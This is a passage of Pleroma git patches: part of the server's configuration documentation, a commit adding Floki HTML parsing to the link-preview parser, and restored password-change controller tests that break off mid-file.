+Another example, keeping console output and adding the pid to syslog output:
+```elixir
+config :logger,
+ backends: [:console, {ExSyslogger, :ex_syslogger}]
+
+config :logger, :ex_syslogger,
+ level: :warn,
+ option: [:pid, :ndelay]
+```
+
+See: [logger’s documentation](https://hexdocs.pm/logger/Logger.html) and [ex_syslogger’s documentation](https://hexdocs.pm/ex_syslogger/)
+
+An example of logging info to local syslog, but warn to a Slack channel:
+```elixir
+config :logger,
+ backends: [ {ExSyslogger, :ex_syslogger}, Quack.Logger ],
+ level: :info
+
+config :logger, :ex_syslogger,
+ level: :info,
+ ident: "pleroma",
+ format: "$metadata[$level] $message"
+
+config :quack,
+ level: :warn,
+ meta: [:all],
+ webhook_url: "https://hooks.slack.com/services/YOUR-API-KEY-HERE"
+```
+
+See the [Quack Github](https://github.com/azohra/quack) for more details
+
+## :frontend_configurations
+
+This can be used to configure a keyword list that keeps the configuration data for any kind of frontend. By default, settings for `pleroma_fe` and `masto_fe` are configured.
+
+Frontends can access these settings at `/api/pleroma/frontend_configurations`
+
+To add your own configuration for PleromaFE, use it like this:
+
+```elixir
+config :pleroma, :frontend_configurations,
+ pleroma_fe: %{
+ theme: "pleroma-dark",
+ # ... see /priv/static/static/config.json for the available keys.
+},
+ masto_fe: %{
+ showInstanceSpecificPanel: true
+ }
+```
+
+These settings **need to be complete**, they will override the defaults.
+
+NOTE: for versions < 1.0, you need to set [`:fe`](#fe) to false, as shown a few lines below.
+
+## :fe
+__THIS IS DEPRECATED__
+
+If you are using this method, please change it to the [`frontend_configurations`](#frontend_configurations) method.
+Please **set this option to false** in your config like this:
+
+```elixir
+config :pleroma, :fe, false
+```
+
+This section is used to configure Pleroma-FE, unless ``:managed_config`` in ``:instance`` is set to false.
+
+* `theme`: Which theme to use, they are defined in ``styles.json``
+* `logo`: URL of the logo, defaults to Pleroma’s logo
+* `logo_mask`: Whether to use only the logo's shape as a mask (true) or as a regular image (false)
+* `logo_margin`: What margin to use around the logo
+* `background`: URL of the background, unless viewing a user profile with a background that is set
+* `redirect_root_no_login`: relative URL which indicates where to redirect when a user isn’t logged in.
+* `redirect_root_login`: relative URL which indicates where to redirect when a user is logged in.
+* `show_instance_panel`: Whenether to show the instance’s specific panel.
+* `scope_options_enabled`: Enable setting an notice visibility and subject/CW when posting
+* `formatting_options_enabled`: Enable setting a formatting different than plain-text (ie. HTML, Markdown) when posting, relates to ``:instance, allowed_post_formats``
+* `collapse_message_with_subjects`: When a message has a subject(aka Content Warning), collapse it by default
+* `hide_post_stats`: Hide notices statistics(repeats, favorites, …)
+* `hide_user_stats`: Hide profile statistics(posts, posts per day, followers, followings, …)
+
+## :assets
+
+This section configures assets to be used with various frontends. Currently the only option
+relates to mascots on the mastodon frontend
+
+* `mascots`: KeywordList of mascots, each element __MUST__ contain both a `url` and a
+ `mime_type` key.
+* `default_mascot`: An element from `mascots` - This will be used as the default mascot
+ on MastoFE (default: `:pleroma_fox_tan`)
+
+## :mrf_simple
+* `media_removal`: List of instances to remove medias from
+* `media_nsfw`: List of instances to put medias as NSFW(sensitive) from
+* `federated_timeline_removal`: List of instances to remove from Federated (aka The Whole Known Network) Timeline
+* `reject`: List of instances to reject any activities from
+* `accept`: List of instances to accept any activities from
+* `report_removal`: List of instances to reject reports from
+* `avatar_removal`: List of instances to strip avatars from
+* `banner_removal`: List of instances to strip banners from
+
+## :mrf_subchain
+This policy processes messages through an alternate pipeline when a given message matches certain criteria.
+All criteria are configured as a map of regular expressions to lists of policy modules.
+
+* `match_actor`: Matches a series of regular expressions against the actor field.
+
+Example:
+
+```
+config :pleroma, :mrf_subchain,
+ match_actor: %{
+ ~r/https:\/\/example.com/s => [Pleroma.Web.ActivityPub.MRF.DropPolicy]
+ }
+```
+
+## :mrf_rejectnonpublic
+* `allow_followersonly`: whether to allow followers-only posts
+* `allow_direct`: whether to allow direct messages
+
+## :mrf_hellthread
+* `delist_threshold`: Number of mentioned users after which the message gets delisted (the message can still be seen, but it will not show up in public timelines and mentioned users won't get notifications about it). Set to 0 to disable.
+* `reject_threshold`: Number of mentioned users after which the messaged gets rejected. Set to 0 to disable.
+
+## :mrf_keyword
+* `reject`: A list of patterns which result in message being rejected, each pattern can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
+* `federated_timeline_removal`: A list of patterns which result in message being removed from federated timelines (a.k.a unlisted), each pattern can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
+* `replace`: A list of tuples containing `{pattern, replacement}`, `pattern` can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
+
+## :mrf_mention
+* `actors`: A list of actors, for which to drop any posts mentioning.
+
+## :mrf_vocabulary
+* `accept`: A list of ActivityStreams terms to accept. If empty, all supported messages are accepted.
+* `reject`: A list of ActivityStreams terms to reject. If empty, no messages are rejected.
+
+## :media_proxy
+* `enabled`: Enables proxying of remote media to the instance’s proxy
+* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host/CDN fronts.
+* `proxy_opts`: All options defined in `Pleroma.ReverseProxy` documentation, defaults to `[max_body_length: (25*1_048_576)]`.
+* `whitelist`: List of domains to bypass the mediaproxy
+
+## :gopher
+* `enabled`: Enables the gopher interface
+* `ip`: IP address to bind to
+* `port`: Port to bind to
+* `dstport`: Port advertised in urls (optional, defaults to `port`)
+
+## Pleroma.Web.Endpoint
+`Phoenix` endpoint configuration, all configuration options can be viewed [here](https://hexdocs.pm/phoenix/Phoenix.Endpoint.html#module-dynamic-configuration), only common options are listed here
+* `http` - a list containing http protocol configuration, all configuration options can be viewed [here](https://hexdocs.pm/plug_cowboy/Plug.Cowboy.html#module-options), only common options are listed here. For deployment using docker, you need to set this to `[ip: {0,0,0,0}, port: 4000]` to make pleroma accessible from other containers (such as your nginx server).
+ - `ip` - a tuple consisting of 4 integers
+ - `port`
+* `url` - a list containing the configuration for generating urls, accepts
+ - `host` - the host without the scheme and a post (e.g `example.com`, not `https://example.com:2020`)
+ - `scheme` - e.g `http`, `https`
+ - `port`
+ - `path`
+* `extra_cookie_attrs` - a list of `Key=Value` strings to be added as non-standard cookie attributes. Defaults to `["SameSite=Lax"]`. See the [SameSite article](https://www.owasp.org/index.php/SameSite) on OWASP for more info.
+
+
+
+**Important note**: if you modify anything inside these lists, default `config.exs` values will be overwritten, which may result in breakage, to make sure this does not happen please copy the default value for the list from `config.exs` and modify/add only what you need
+
+Example:
+```elixir
+config :pleroma, Pleroma.Web.Endpoint,
+ url: [host: "example.com", port: 2020, scheme: "https"],
+ http: [
+ # start copied from config.exs
+ dispatch: [
+ {:_,
+ [
+ {"/api/v1/streaming", Pleroma.Web.MastodonAPI.WebsocketHandler, []},
+ {"/websocket", Phoenix.Endpoint.CowboyWebSocket,
+ {Phoenix.Transports.WebSocket,
+ {Pleroma.Web.Endpoint, Pleroma.Web.UserSocket, websocket_config}}},
+ {:_, Phoenix.Endpoint.Cowboy2Handler, {Pleroma.Web.Endpoint, []}}
+ ]}
+ # end copied from config.exs
+ ],
+ port: 8080,
+ ip: {127, 0, 0, 1}
+ ]
+```
+
+This will make Pleroma listen on `127.0.0.1` port `8080` and generate urls starting with `https://example.com:2020`
+
+## :activitypub
+* ``unfollow_blocked``: Whether blocks result in people getting unfollowed
+* ``outgoing_blocks``: Whether to federate blocks to other instances
+* ``deny_follow_blocked``: Whether to disallow following an account that has blocked the user in question
+* ``sign_object_fetches``: Sign object fetches with HTTP signatures
+
+## :http_security
+* ``enabled``: Whether the managed content security policy is enabled
+* ``sts``: Whether to additionally send a `Strict-Transport-Security` header
+* ``sts_max_age``: The maximum age for the `Strict-Transport-Security` header if sent
+* ``ct_max_age``: The maximum age for the `Expect-CT` header if sent
+* ``referrer_policy``: The referrer policy to use, either `"same-origin"` or `"no-referrer"`
+* ``report_uri``: Adds the specified url to `report-uri` and `report-to` group in CSP header.
+
+## :mrf_user_allowlist
+
+The keys in this section are the domain names that the policy should apply to.
+Each key should be assigned a list of users that should be allowed through by
+their ActivityPub ID.
+
+An example:
+
+```elixir
+config :pleroma, :mrf_user_allowlist,
+ "example.org": ["https://example.org/users/admin"]
+```
+
+## :web_push_encryption, :vapid_details
+
+Web Push Notifications configuration. You can use the mix task `mix web_push.gen.keypair` to generate it.
+
+* ``subject``: a mailto link for the administrative contact. It’s best if this email is not a personal email address, but rather a group email so that if a person leaves an organization, is unavailable for an extended period, or otherwise can’t respond, someone else on the list can.
+* ``public_key``: VAPID public key
+* ``private_key``: VAPID private key
+
+## Pleroma.Captcha
+* `enabled`: Whether the captcha should be shown on registration
+* `method`: The method/service to use for captcha
+* `seconds_valid`: The time in seconds for which the captcha is valid
+
+### Pleroma.Captcha.Kocaptcha
+Kocaptcha is a very simple captcha service with a single API endpoint,
+the source code is here: https://github.com/koto-bank/kocaptcha. The default endpoint
+`https://captcha.kotobank.ch` is hosted by the developer.
+
+* `endpoint`: the kocaptcha endpoint to use
+
+## :admin_token
+
+Allows to set a token that can be used to authenticate with the admin api without using an actual user by giving it as the 'admin_token' parameter. Example:
+
+```elixir
+config :pleroma, :admin_token, "somerandomtoken"
+```
+
+You can then do
+
+```sh
+curl "http://localhost:4000/api/pleroma/admin/invite_token?admin_token=somerandomtoken"
+```
+
+## Oban
+
+[Oban](https://github.com/sorentwo/oban) asynchronous job processor configuration.
+
+Configuration options described in [Oban readme](https://github.com/sorentwo/oban#usage):
+* `repo` - app's Ecto repo (`Pleroma.Repo`)
+* `verbose` - logs verbosity
+* `prune` - non-retryable jobs [pruning settings](https://github.com/sorentwo/oban#pruning) (`:disabled` / `{:maxlen, value}` / `{:maxage, value}`)
+* `queues` - job queues (see below)
+
+Pleroma has the following queues:
+
+* `activity_expiration` - Activity expiration
+* `federator_outgoing` - Outgoing federation
+* `federator_incoming` - Incoming federation
+* `mailer` - Email sender, see [`Pleroma.Emails.Mailer`](#pleromaemailsmailer)
+* `transmogrifier` - Transmogrifier
+* `web_push` - Web push notifications
+* `scheduled_activities` - Scheduled activities, see [`Pleroma.ScheduledActivity`](#pleromascheduledactivity)
+
+Example:
+
+```elixir
+config :pleroma, Oban,
+ repo: Pleroma.Repo,
+ verbose: false,
+ prune: {:maxlen, 1500},
+ queues: [
+ federator_incoming: 50,
+ federator_outgoing: 50
+ ]
+```
+
+This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the number of max concurrent jobs set to `50`.
+
+### Migrating `pleroma_job_queue` settings
+
+`config :pleroma_job_queue, :queues` is replaced by `config :pleroma, Oban, :queues` and uses the same format (keys are queues' names, values are max concurrent jobs numbers).
+
+### Note on running with PostgreSQL in silent mode
+
+If you are running PostgreSQL in [`silent_mode`](https://postgresqlco.nf/en/doc/param/silent_mode?version=9.1), it's advised to set [`log_destination`](https://postgresqlco.nf/en/doc/param/log_destination?version=9.1) to `syslog`,
+otherwise `postmaster.log` file may grow because of "you don't own a lock of type ShareLock" warnings (see https://github.com/sorentwo/oban/issues/52).
+
+## :workers
+
+Includes custom worker options not interpretable directly by `Oban`.
+
+* `retries` — keyword lists where keys are `Oban` queues (see above) and values are numbers of max attempts for failed jobs.
+
+Example:
+
+```elixir
+config :pleroma, :workers,
+ retries: [
+ federator_incoming: 5,
+ federator_outgoing: 5
+ ]
+```
+
+### Migrating `Pleroma.Web.Federator.RetryQueue` settings
+
+* `max_retries` is replaced with `config :pleroma, :workers, retries: [federator_outgoing: 5]`
+* `enabled: false` corresponds to `config :pleroma, :workers, retries: [federator_outgoing: 1]`
+* deprecated options: `max_jobs`, `initial_timeout`
+
+## Pleroma.Web.Metadata
+* `providers`: a list of metadata providers to enable. Providers available:
+ * Pleroma.Web.Metadata.Providers.OpenGraph
+ * Pleroma.Web.Metadata.Providers.TwitterCard
+ * Pleroma.Web.Metadata.Providers.RelMe - add links from user bio with rel=me into the `` as ``
+* `unfurl_nsfw`: If set to `true` nsfw attachments will be shown in previews
+
+## :rich_media
+* `enabled`: if enabled the instance will parse metadata from attached links to generate link previews
+* `ignore_hosts`: list of hosts which will be ignored by the metadata parser. For example `["accounts.google.com", "xss.website"]`, defaults to `[]`.
+* `ignore_tld`: list TLDs (top-level domains) which will ignore for parse metadata. default is ["local", "localdomain", "lan"]
+* `parsers`: list of Rich Media parsers
+
+## :fetch_initial_posts
+* `enabled`: if enabled, when a new user is federated with, fetch some of their latest posts
+* `pages`: the amount of pages to fetch
+
+## :hackney_pools
+
+Advanced. Tweaks Hackney (http client) connections pools.
+
+There's three pools used:
+
+* `:federation` for the federation jobs.
+ You may want this pool max_connections to be at least equal to the number of federator jobs + retry queue jobs.
+* `:media` for rich media, media proxy
+* `:upload` for uploaded media (if using a remote uploader and `proxy_remote: true`)
+
+For each pool, the options are:
+
+* `max_connections` - how much connections a pool can hold
+* `timeout` - retention duration for connections
+
+## :auto_linker
+
+Configuration for the `auto_linker` library:
+
+* `class: "auto-linker"` - specify the class to be added to the generated link. false to clear
+* `rel: "noopener noreferrer"` - override the rel attribute. false to clear
+* `new_window: true` - set to false to remove `target='_blank'` attribute
+* `scheme: false` - Set to true to link urls with schema `http://google.com`
+* `truncate: false` - Set to a number to truncate urls longer then the number. Truncated urls will end in `..`
+* `strip_prefix: true` - Strip the scheme prefix
+* `extra: false` - link urls with rarely used schemes (magnet, ipfs, irc, etc.)
+
+Example:
+
+```elixir
+config :auto_linker,
+ opts: [
+ scheme: true,
+ extra: true,
+ class: false,
+ strip_prefix: false,
+ new_window: false,
+ rel: false
+ ]
+```
+
+## Pleroma.Scheduler
+
+Configuration for [Quantum](https://github.com/quantum-elixir/quantum-core) jobs scheduler.
+
+See [Quantum readme](https://github.com/quantum-elixir/quantum-core#usage) for the list of supported options.
+
+Example:
+
+```elixir
+config :pleroma, Pleroma.Scheduler,
+ global: true,
+ overlap: true,
+ timezone: :utc,
+ jobs: [{"0 */6 * * * *", {Pleroma.Web.Websub, :refresh_subscriptions, []}}]
+```
+
+The above example defines a single job which invokes `Pleroma.Web.Websub.refresh_subscriptions()` every 6 hours ("0 */6 * * * *", [crontab format](https://en.wikipedia.org/wiki/Cron)).
+
+## Pleroma.ScheduledActivity
+
+* `daily_user_limit`: the number of scheduled activities a user is allowed to create in a single day (Default: `25`)
+* `total_user_limit`: the number of scheduled activities a user is allowed to create in total (Default: `300`)
+* `enabled`: whether scheduled activities are sent to the job queue to be executed
+
+## Pleroma.ActivityExpiration
+
+# `enabled`: whether expired activities will be sent to the job queue to be deleted
+
+## Pleroma.Web.Auth.Authenticator
+
+* `Pleroma.Web.Auth.PleromaAuthenticator`: default database authenticator
+* `Pleroma.Web.Auth.LDAPAuthenticator`: LDAP authentication
+
+## :ldap
+
+Use LDAP for user authentication. When a user logs in to the Pleroma
+instance, the name and password will be verified by trying to authenticate
+(bind) to an LDAP server. If a user exists in the LDAP directory but there
+is no account with the same name yet on the Pleroma instance then a new
+Pleroma account will be created with the same name as the LDAP user name.
+
+* `enabled`: enables LDAP authentication
+* `host`: LDAP server hostname
+* `port`: LDAP port, e.g. 389 or 636
+* `ssl`: true to use SSL, usually implies the port 636
+* `sslopts`: additional SSL options
+* `tls`: true to start TLS, usually implies the port 389
+* `tlsopts`: additional TLS options
+* `base`: LDAP base, e.g. "dc=example,dc=com"
+* `uid`: LDAP attribute name to authenticate the user, e.g. when "cn", the filter will be "cn=username,base"
+
+## BBS / SSH access
+
+To enable simple command line interface accessible over ssh, add a setting like this to your configuration file:
+
+```exs
+app_dir = File.cwd!
+priv_dir = Path.join([app_dir, "priv/ssh_keys"])
+
+config :esshd,
+ enabled: true,
+ priv_dir: priv_dir,
+ handler: "Pleroma.BBS.Handler",
+ port: 10_022,
+ password_authenticator: "Pleroma.BBS.Authenticator"
+```
+
+Feel free to adjust the priv_dir and port number. Then you will have to create the key for the keys (in the example `priv/ssh_keys`) and create the host keys with `ssh-keygen -m PEM -N "" -b 2048 -t rsa -f ssh_host_rsa_key`. After restarting, you should be able to connect to your Pleroma instance with `ssh username@server -p $PORT`
+
+## :auth
+
+* `Pleroma.Web.Auth.PleromaAuthenticator`: default database authenticator
+* `Pleroma.Web.Auth.LDAPAuthenticator`: LDAP authentication
+
+Authentication / authorization settings.
+
+* `auth_template`: authentication form template. By default it's `show.html` which corresponds to `lib/pleroma/web/templates/o_auth/o_auth/show.html.eex`.
+* `oauth_consumer_template`: OAuth consumer mode authentication form template. By default it's `consumer.html` which corresponds to `lib/pleroma/web/templates/o_auth/o_auth/consumer.html.eex`.
+* `oauth_consumer_strategies`: the list of enabled OAuth consumer strategies; by default it's set by `OAUTH_CONSUMER_STRATEGIES` environment variable. Each entry in this space-delimited string should be of format `` or `:` (e.g. `twitter` or `keycloak:ueberauth_keycloak_strategy` in case dependency is named differently than `ueberauth_`).
+
+## :email_notifications
+
+Email notifications settings.
+
+ - digest - emails of "what you've missed" for users who have been
+ inactive for a while.
+ - active: globally enable or disable digest emails
+ - schedule: When to send digest email, in [crontab format](https://en.wikipedia.org/wiki/Cron).
+ "0 0 * * 0" is the default, meaning "once a week at midnight on Sunday morning"
+ - interval: Minimum interval between digest emails to one user
+ - inactivity_threshold: Minimum user inactivity threshold
+
+## Pleroma.Emails.UserEmail
+
+- `:logo` - a path to a custom logo. Set it to `nil` to use the default Pleroma logo.
+- `:styling` - a map with color settings for email templates.
+
+## OAuth consumer mode
+
+OAuth consumer mode allows sign in / sign up via external OAuth providers (e.g. Twitter, Facebook, Google, Microsoft, etc.).
+Implementation is based on Ueberauth; see the list of [available strategies](https://github.com/ueberauth/ueberauth/wiki/List-of-Strategies).
+
+Note: each strategy is shipped as a separate dependency; in order to get the strategies, run `OAUTH_CONSUMER_STRATEGIES="..." mix deps.get`,
+e.g. `OAUTH_CONSUMER_STRATEGIES="twitter facebook google microsoft" mix deps.get`.
+The server should also be started with `OAUTH_CONSUMER_STRATEGIES="..." mix phx.server` in case you enable any strategies.
+
+Note: each strategy requires separate setup (on external provider side and Pleroma side). Below are the guidelines on setting up most popular strategies.
+
+Note: make sure that `"SameSite=Lax"` is set in `extra_cookie_attrs` when you have this feature enabled. OAuth consumer mode will not work with `"SameSite=Strict"`
+
+* For Twitter, [register an app](https://developer.twitter.com/en/apps), configure callback URL to https:///oauth/twitter/callback
+
+* For Facebook, [register an app](https://developers.facebook.com/apps), configure callback URL to https:///oauth/facebook/callback, enable Facebook Login service at https://developers.facebook.com/apps//fb-login/settings/
+
+* For Google, [register an app](https://console.developers.google.com), configure callback URL to https:///oauth/google/callback
+
+* For Microsoft, [register an app](https://portal.azure.com), configure callback URL to https:///oauth/microsoft/callback
+
+Once the app is configured on external OAuth provider side, add app's credentials and strategy-specific settings (if any — e.g. see Microsoft below) to `config/prod.secret.exs`,
+per strategy's documentation (e.g. [ueberauth_twitter](https://github.com/ueberauth/ueberauth_twitter)). Example config basing on environment variables:
+
+```elixir
+# Twitter
+config :ueberauth, Ueberauth.Strategy.Twitter.OAuth,
+ consumer_key: System.get_env("TWITTER_CONSUMER_KEY"),
+ consumer_secret: System.get_env("TWITTER_CONSUMER_SECRET")
+
+# Facebook
+config :ueberauth, Ueberauth.Strategy.Facebook.OAuth,
+ client_id: System.get_env("FACEBOOK_APP_ID"),
+ client_secret: System.get_env("FACEBOOK_APP_SECRET"),
+ redirect_uri: System.get_env("FACEBOOK_REDIRECT_URI")
+
+# Google
+config :ueberauth, Ueberauth.Strategy.Google.OAuth,
+ client_id: System.get_env("GOOGLE_CLIENT_ID"),
+ client_secret: System.get_env("GOOGLE_CLIENT_SECRET"),
+ redirect_uri: System.get_env("GOOGLE_REDIRECT_URI")
+
+# Microsoft
+config :ueberauth, Ueberauth.Strategy.Microsoft.OAuth,
+ client_id: System.get_env("MICROSOFT_CLIENT_ID"),
+ client_secret: System.get_env("MICROSOFT_CLIENT_SECRET")
+
+config :ueberauth, Ueberauth,
+ providers: [
+ microsoft: {Ueberauth.Strategy.Microsoft, [callback_params: []]}
+ ]
+
+# Keycloak
+# Note: make sure to add `keycloak:ueberauth_keycloak_strategy` entry to `OAUTH_CONSUMER_STRATEGIES` environment variable
+keycloak_url = "https://publicly-reachable-keycloak-instance.org:8080"
+
+config :ueberauth, Ueberauth.Strategy.Keycloak.OAuth,
+ client_id: System.get_env("KEYCLOAK_CLIENT_ID"),
+ client_secret: System.get_env("KEYCLOAK_CLIENT_SECRET"),
+ site: keycloak_url,
+ authorize_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/auth",
+ token_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/token",
+ userinfo_url: "#{keycloak_url}/auth/realms/master/protocol/openid-connect/userinfo",
+ token_method: :post
+
+config :ueberauth, Ueberauth,
+ providers: [
+ keycloak: {Ueberauth.Strategy.Keycloak, [uid_field: :email]}
+ ]
+```
+
+## OAuth 2.0 provider - :oauth2
+
+Configure OAuth 2 provider capabilities:
+
+* `token_expires_in` - The lifetime in seconds of the access token.
+* `issue_new_refresh_token` - Keeps old refresh token or generate new refresh token when to obtain an access token.
+* `clean_expired_tokens` - Enable a background job to clean expired oauth tokens. Defaults to `false`.
+* `clean_expired_tokens_interval` - Interval to run the job to clean expired tokens. Defaults to `86_400_000` (24 hours).
+
+## :emoji
+* `shortcode_globs`: Location of custom emoji files. `*` can be used as a wildcard. Example `["/emoji/custom/**/*.png"]`
+* `pack_extensions`: A list of file extensions for emojis, when no emoji.txt for a pack is present. Example `[".png", ".gif"]`
+* `groups`: Emojis are ordered in groups (tags). This is an array of key-value pairs where the key is the groupname and the value the location or array of locations. `*` can be used as a wildcard. Example `[Custom: ["/emoji/*.png", "/emoji/custom/*.png"]]`
+* `default_manifest`: Location of the JSON-manifest. This manifest contains information about the emoji-packs you can download. Currently only one manifest can be added (no arrays).
+
+## Database options
+
+### RUM indexing for full text search
+* `rum_enabled`: If RUM indexes should be used. Defaults to `false`.
+
+RUM indexes are an alternative indexing scheme that is not included in PostgreSQL by default. While they may eventually be mainlined, for now they have to be installed as a PostgreSQL extension from https://github.com/postgrespro/rum.
+
+Their advantage over the standard GIN indexes is that they allow efficient ordering of search results by timestamp, which makes search queries a lot faster on larger servers, by one or two orders of magnitude. They take up around 3 times as much space as GIN indexes.
+
+To enable them, both the `rum_enabled` flag has to be set and the following special migration has to be run:
+
+`mix ecto.migrate --migrations-path priv/repo/optional_migrations/rum_indexing/`
+
+This will probably take a long time.
+
+## :rate_limit
+
+This is an advanced feature and disabled by default.
+
+A keyword list of rate limiters where a key is a limiter name and value is the limiter configuration. The basic configuration is a tuple where:
+
+* The first element: `scale` (Integer). The time scale in milliseconds.
+* The second element: `limit` (Integer). How many requests to limit in the time scale provided.
+
+It is also possible to have different limits for unauthenticated and authenticated users: the keyword value must be a list of two tuples where the first one is a config for unauthenticated users and the second one is for authenticated.
+
+See [`Pleroma.Plugs.RateLimiter`](Pleroma.Plugs.RateLimiter.html) documentation for examples.
+
+Supported rate limiters:
+
+* `:search` for the search requests (account & status search etc.)
+* `:app_account_creation` for registering user accounts from the same IP address
+* `:relations_actions` for actions on relations with all users (follow, unfollow)
+* `:relation_id_action` for actions on relation with a specific user (follow, unfollow)
+* `:statuses_actions` for create / delete / fav / unfav / reblog / unreblog actions on any statuses
+* `:status_id_action` for fav / unfav or reblog / unreblog actions on the same status by the same user
+
+## :web_cache_ttl
+
+The expiration time for the web responses cache. Values should be in milliseconds or `nil` to disable expiration.
+
+Available caches:
+
+* `:activity_pub` - activity pub routes (except question activities). Defaults to `nil` (no expiration).
+* `:activity_pub_question` - activity pub routes (question activities). Defaults to `30_000` (30 seconds).
From b4cf74c1067b866574a63fbd25ccb12cc1fed619 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Sun, 15 Sep 2019 14:53:58 +0300
Subject: [PATCH 075/272] added prepare html for RichMedia.Parser
---
lib/pleroma/web/rich_media/parser.ex | 6 +++++-
mix.exs | 2 +-
mix.lock | 2 +-
3 files changed, 7 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/web/rich_media/parser.ex b/lib/pleroma/web/rich_media/parser.ex
index f5f9e358c..c06b0a0f2 100644
--- a/lib/pleroma/web/rich_media/parser.ex
+++ b/lib/pleroma/web/rich_media/parser.ex
@@ -81,6 +81,7 @@ defp parse_url(url) do
{:ok, %Tesla.Env{body: html}} = Pleroma.HTTP.get(url, [], adapter: @hackney_options)
html
+ |> parse_html
|> maybe_parse()
|> Map.put(:url, url)
|> clean_parsed_data()
@@ -91,6 +92,8 @@ defp parse_url(url) do
end
end
+ defp parse_html(html), do: Floki.parse(html)
+
defp maybe_parse(html) do
Enum.reduce_while(parsers(), %{}, fn parser, acc ->
case parser.parse(html, acc) do
@@ -100,7 +103,8 @@ defp maybe_parse(html) do
end)
end
- defp check_parsed_data(%{title: title} = data) when is_binary(title) and byte_size(title) > 0 do
+ defp check_parsed_data(%{title: title} = data)
+ when is_binary(title) and byte_size(title) > 0 do
{:ok, data}
end
diff --git a/mix.exs b/mix.exs
index dfa530358..6f952fa12 100644
--- a/mix.exs
+++ b/mix.exs
@@ -131,7 +131,7 @@ defp deps do
{:phoenix_swoosh, "~> 0.2"},
{:gen_smtp, "~> 0.13"},
{:websocket_client, git: "https://github.com/jeremyong/websocket_client.git", only: :test},
- {:floki, "~> 0.20.0"},
+ {:floki, "~> 0.23.0"},
{:ex_syslogger, github: "slashmili/ex_syslogger", tag: "1.4.0"},
{:timex, "~> 3.5"},
{:ueberauth, "~> 0.4"},
diff --git a/mix.lock b/mix.lock
index 5762dae4f..2bce00dea 100644
--- a/mix.lock
+++ b/mix.lock
@@ -34,7 +34,7 @@
"ex_rated": {:hex, :ex_rated, "1.3.3", "30ecbdabe91f7eaa9d37fa4e81c85ba420f371babeb9d1910adbcd79ec798d27", [:mix], [{:ex2ms, "~> 1.5", [hex: :ex2ms, repo: "hexpm", optional: false]}], "hexpm"},
"ex_syslogger": {:git, "https://github.com/slashmili/ex_syslogger.git", "f3963399047af17e038897c69e20d552e6899e1d", [tag: "1.4.0"]},
"excoveralls": {:hex, :excoveralls, "0.11.1", "dd677fbdd49114fdbdbf445540ec735808250d56b011077798316505064edb2c", [:mix], [{:hackney, "~> 1.0", [hex: :hackney, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: false]}], "hexpm"},
- "floki": {:hex, :floki, "0.20.4", "be42ac911fece24b4c72f3b5846774b6e61b83fe685c2fc9d62093277fb3bc86", [:mix], [{:html_entities, "~> 0.4.0", [hex: :html_entities, repo: "hexpm", optional: false]}, {:mochiweb, "~> 2.15", [hex: :mochiweb, repo: "hexpm", optional: false]}], "hexpm"},
+ "floki": {:hex, :floki, "0.23.0", "956ab6dba828c96e732454809fb0bd8d43ce0979b75f34de6322e73d4c917829", [:mix], [{:html_entities, "~> 0.4.0", [hex: :html_entities, repo: "hexpm", optional: false]}], "hexpm"},
"gen_smtp": {:hex, :gen_smtp, "0.14.0", "39846a03522456077c6429b4badfd1d55e5e7d0fdfb65e935b7c5e38549d9202", [:rebar3], [], "hexpm"},
"gettext": {:hex, :gettext, "0.17.0", "abe21542c831887a2b16f4c94556db9c421ab301aee417b7c4fbde7fbdbe01ec", [:mix], [], "hexpm"},
"hackney": {:hex, :hackney, "1.15.1", "9f8f471c844b8ce395f7b6d8398139e26ddca9ebc171a8b91342ee15a19963f4", [:rebar3], [{:certifi, "2.5.1", [hex: :certifi, repo: "hexpm", optional: false]}, {:idna, "6.0.0", [hex: :idna, repo: "hexpm", optional: false]}, {:metrics, "1.0.1", [hex: :metrics, repo: "hexpm", optional: false]}, {:mimerl, "~>1.1", [hex: :mimerl, repo: "hexpm", optional: false]}, {:ssl_verify_fun, "1.1.4", [hex: :ssl_verify_fun, repo: "hexpm", optional: false]}], "hexpm"},
From 43f17c2e67cfb85ae469eee39b526a5baf7c7408 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Thu, 12 Sep 2019 19:04:55 +0700
Subject: [PATCH 076/272] Restore tests for `change_password` and
`delete_account`
---
test/web/twitter_api/util_controller_test.exs | 105 ++++++++++++++++++
1 file changed, 105 insertions(+)
diff --git a/test/web/twitter_api/util_controller_test.exs b/test/web/twitter_api/util_controller_test.exs
index 0a2a48fb7..56e318182 100644
--- a/test/web/twitter_api/util_controller_test.exs
+++ b/test/web/twitter_api/util_controller_test.exs
@@ -775,4 +775,109 @@ test "with credentials, valid password and valid email", %{
assert json_response(conn, 200) == %{"status" => "success"}
end
end
+
+ describe "POST /api/pleroma/change_password" do
+ setup [:valid_user]
+
+ test "without credentials", %{conn: conn} do
+ conn = post(conn, "/api/pleroma/change_password")
+ assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
+ end
+
+ test "with credentials and invalid password", %{conn: conn, user: current_user} do
+ conn =
+ conn
+ |> with_credentials(current_user.nickname, "test")
+ |> post("/api/pleroma/change_password", %{
+ "password" => "hi",
+ "new_password" => "newpass",
+ "new_password_confirmation" => "newpass"
+ })
+
+ assert json_response(conn, 200) == %{"error" => "Invalid password."}
+ end
+
+ test "with credentials, valid password and new password and confirmation not matching", %{
+ conn: conn,
+ user: current_user
+ } do
+ conn =
+ conn
+ |> with_credentials(current_user.nickname, "test")
+ |> post("/api/pleroma/change_password", %{
+ "password" => "test",
+ "new_password" => "newpass",
+ "new_password_confirmation" => "notnewpass"
+ })
+
+ assert json_response(conn, 200) == %{
+ "error" => "New password does not match confirmation."
+ }
+ end
+
+ test "with credentials, valid password and invalid new password", %{
+ conn: conn,
+ user: current_user
+ } do
+ conn =
+ conn
+ |> with_credentials(current_user.nickname, "test")
+ |> post("/api/pleroma/change_password", %{
+ "password" => "test",
+ "new_password" => "",
+ "new_password_confirmation" => ""
+ })
+
+ assert json_response(conn, 200) == %{
+ "error" => "New password can't be blank."
+ }
+ end
+
